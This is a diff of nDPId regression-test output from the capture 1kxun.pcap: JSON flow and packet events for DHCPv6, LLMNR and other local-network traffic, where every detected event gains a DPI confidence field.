 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1470104403234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104403234,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow8AAAER19fAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1470104404055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104404055,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfbcLBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgAAAAYABAAXABg="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":180000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1470104405794,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1470104405794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"ts_msec":1470104405794,"pkt":"\/\/\/\/\/\/\/\/TF4MVkdPCABFAACVAABAAEARAq7AqHcC\/\/\/\/\/6sKFi4AgSnvAAHqAgABAAZMXgxWR08ABQAJSVB2NlJvdXRlAAcADzYuMzUuNCAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAQGBzYAAAsACVZTMUwtUTE4UgAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAA0xBTg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104406717,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104406717,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LR4AAAER5cfAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104408049,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyAAAAER6Y\/AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1470104408457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104408457,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1470104408458,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104408458,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyIAAAER6Y3AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
 00872{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104408662,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tHCABFAAFZOwBAAEARwM3AqH0e\/\/\/\/\/\/YA9gABRUfM\/\/+TXaAAwKC7c+tHwKh9HgAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tHQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI1AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqH0e\/\/8AAFBvcnQgMTAAIAGwMAIUAQDCoLv\/\/nPrR0A="}
 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"ts_msec":1470104408662,"pkt":"MzMAAAABwKC7c+tHht1gAAAAAVERgCABsDACFAEAwqC7\/\/5z60f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRTer\/D5NdoADAoLtz60cgAbAwAhQBAMKgu\/\/+c+tHAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz60dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjUAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCofR7\/\/wAAUG9ydCAxMAAgAbAwAhQBAMKgu\/\/+c+tHQA=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104409586,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1470104409586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104409586,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6gAAAER9IDAqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -424,19 +424,19 @@
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="}
